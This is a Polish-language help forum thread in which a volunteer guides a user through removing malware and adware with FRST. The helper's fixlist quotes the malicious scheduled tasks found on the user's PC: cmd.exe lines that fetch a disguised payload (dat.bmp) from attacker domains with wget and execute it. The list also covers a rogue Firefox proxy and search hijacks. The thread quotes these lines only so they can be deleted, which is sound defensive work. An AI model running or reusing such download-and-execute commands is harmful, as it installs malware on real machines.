Dodaj do ulubionych

Log do oceny..

06.02.15, 19:40
wklej.org/id/1626730/
Obserwuj wątek
    • kolobos Re: Log do oceny.. 06.02.15, 21:45
      Wystarczy RAZ napisac. Do tego brakuje addition.txt.
    • fuiio Re: Log do oceny.. 06.02.15, 22:46
      Sorki Mistrzu, myslalem ,ze mnie nikt nie zauwazyl.. Nie wiem czy chodzilo Ci o log z tego programu malware czy jakis inny? zalaczam log z malware..
      wklej.org/id/1626999/
      • kolobos Re: Log do oceny.. 06.02.15, 22:55
        Dlaczego nie wiesz? Przeciez w podwieszonym watku masz jasno podane, ze frst.txt oraz addition.txt tworzy FRST, wiec nie wiem po co dajesz log z mbam.
    • fuiio Re: Log do oceny.. 06.02.15, 23:39
      nie widzialem jakos tej opcji..teraz jest komplet..

      wklej.org/id/1627061/
      wklej.org/id/1627064/
      • kolobos Re: Log do oceny.. 07.02.15, 00:41
        Odinstaluj:
        Eusing Free Registry Cleaner
        Java(TM) 6 Update 29

        Obok frst.exe utworz plik fixlist.txt z zawartoscia:
        Task: {15225383-F78D-46AA-B44F-B980520BBC8A} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp iashdb.in/index.php?data=nSDagsDIOG;up;1421913803 & start cmd /R dat.bmp
        Task: {72F8DC7A-00D0-4524-89EB-4543A224EFDF} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp sdshdb.nl/index.php?data=U2qpZHWf1F;up;1421913813 & start cmd /R dat.bmp
        Task: {904B1698-38B3-4BE3-84FE-A44E38076F51} - \AdobeFlashPlayerUpdate No Task File <==== ATTENTION
        Task: {E5F3F836-5F7A-42D9-B99F-0BB0B4670859} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp grogle.in/dat.bmp?data=1HupDX8AWb;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1421756713 & start cmd /R dat.bmp <==== ATTENTION
        () C:\Program Files (x86)\Tor\tor.exe
        HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0\...\Run: [fsm] => [X]
        HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0\Software\Microsoft\Internet Explorer\Main,ICQ Search = http://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
        URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {00000000-6E41-4FD3-8538-502F5495E5FC} - No File
        URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {fc01c2be-850b-4115-9b6b-9a427ddecc34} - No File
        URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {40c3cc16-7269-4b32-9531-17f2950fb06f} - No File
        SearchScopes: HKLM -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
        SearchScopes: HKLM-x32 -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
        SearchScopes: HKU\.DEFAULT -> {114F1C55-C7A9-4A0D-B1C6-0FF5223FE042} URL =
        SearchScopes: HKU\.DEFAULT -> {90E96A71-522E-457D-9C51-62A63A820610} URL =
        SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
        SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> Plasmoo URL = http://plasmoo.com/index.htm?SearchMashine=true&q={searchTerms}
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {6552C7DD-90A4-4387-B795-F8F96747DE19} URL = http://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {8A96AF9E-4074-43b7-BEA3-87217BDA7406} URL = http://www.searchqu.com/web?src=ieb&systemid=406&q={searchTerms}
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {90E96A71-522E-457D-9C51-62A63A820610} URL = http://de.wikipedia.org/wiki/Special:Search?search={searchTerms}
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = http://www.daemon-search.com/search/web?q={searchTerms}
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2304157
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {C7576B9D-B442-46bc-AF74-080A9E723E01} URL = http://websearch.search-results.com/redirect?client=ie&tb=STC-SRS&o=41648033&src=crm&q={searchTerms}&locale=de_DE&apn_ptnrs=96&apn_dtid=YYYYYYYYDE&apn_uid=8DD0CB95-F756-4257-8A87-471817A3DF21&apn_sauid=5201C84C-128E-45C5-9ECE-FE7E319C1292
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {E08A9998-D98F-476f-8F5C-37C80FE0A4DA} URL = http://search.conduit.com/?SearchSource=10&ctid=CT2528046
        SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
        BHO-x32: No Name -> {451C804F-C205-4F03-B48E-537EC94937BF} -> No File
        Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
        Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {32099AAC-C132-4136-9E9A-4E364A424E17} - No File
        Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
        FF NetworkProxy: "http", "194.213.52.202"
        FF NetworkProxy: "http_port", 3128
        FF NetworkProxy: "type", 2
        FF Extension: No Name - C:\Users\Mike Lorenzen\AppData\Roaming\Mozilla\Firefox\Profiles\89fruptw.default\extensions\{d43723ae-1ae1-4a25-a6a4-bf0929273cab} [Not Found]
        FF Extension: No Name - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com [Not Found]
        FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
        CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hp&ts=1422912556&from=cor&uid=HitachiXHDS721010CLA332_JP2940HD3WBVAC3WBVACX"
        CHR Extension: (Delta Toolbar) - C:\Users\Mike Lorenzen\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\eooncjejnppfjjklapaamhcdmjbilmde [2013-04-07]
        CHR Extension: (BrowserProtect) - C:\Users\Mike Lorenzen\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pgafcinpmmpklohkojmllohdhomoefph [2013-04-07]
        CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - No Path
        CHR HKLM-x32\...\Chrome\Extension: [hfjckbbeondgbgemllebneccphndhhda] - No Path
        R2 tor; C:\Program Files (x86)\Tor\tor.exe [3233806 2013-08-23] () [File not signed] <==== ATTENTION
        U3 DfSdkS; No ImagePath
        S3 dump_wmimmc; \??\C:\Program Files (x86)\SEGA\PHANTASY STAR UNIVERSE\GameGuard\dump_wmimmc.sys [X]
        S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
        S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
        S3 X6va005; \??\C:\Users\MIKELO~1\AppData\Local\Temp\005F112.tmp [X]
        2015-02-02 22:29 - 2015-02-02 22:29 - 00000179 _____ () C:\Users\Mike Lorenzen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
        2015-02-02 22:29 - 2015-02-02 22:29 - 00000000 ___HD () C:\Users\Mike Lorenzen\AppData\Roaming\GoldenGate
        C:\Windows\SysWOW64\sho*.tmp
        2015-02-06 18:46 - 2013-09-22 01:27 - 00000000 ____D () C:\AdwCleaner
        EmptTemp:

        W FRST wybierz Fix.

        Po wykonaniu daj now
        • kolobos Re: Log do oceny.. 07.02.15, 00:42
          Po wykonaniu daj nowe logi ze skanowania z FRST.
          • fuiio Re: Log do oceny.. 08.02.15, 09:56
            Musialem niesty wybyc na 1 dobe na pogrzeb..
            Oto log po fixie..

            wklej.org/id/1628556/
            • Gość: Kolobos Re: Log do oceny.. IP: *.zask.pl 08.02.15, 10:10
              Miales dac nowe logi z FRST, ze skanowana, a nie log z wykonania skryptu.
            • fuiio Re: Log do oceny.. 08.02.15, 10:15

              wklej.org/id/1628563/
              wklej.org/id/1628564/
    • fuiio Re: Log do oceny.. 11.02.15, 23:21
      Czy juz jest wszystko OK?
    • fuiio Re: Log do oceny.. 12.02.15, 11:11
      Reklamy znikly. Jezeli nie mam juz zadnych patologii w komputerze to serdecznie dziekuje Ci Kolobosie. W razie czego pomoge rozwiazac problem muzyczny albo motoryzacyjny..Pozdrawiam goraco
      • Gość: Kolobos Re: Log do oceny.. IP: *.internetdsl.tpnet.pl 12.02.15, 11:21
        Wszystko juz wyglada ok. Usun katalog C:\FRST i to wszystko.

Nie masz jeszcze konta? Zarejestruj się


Nakarm Pajacyka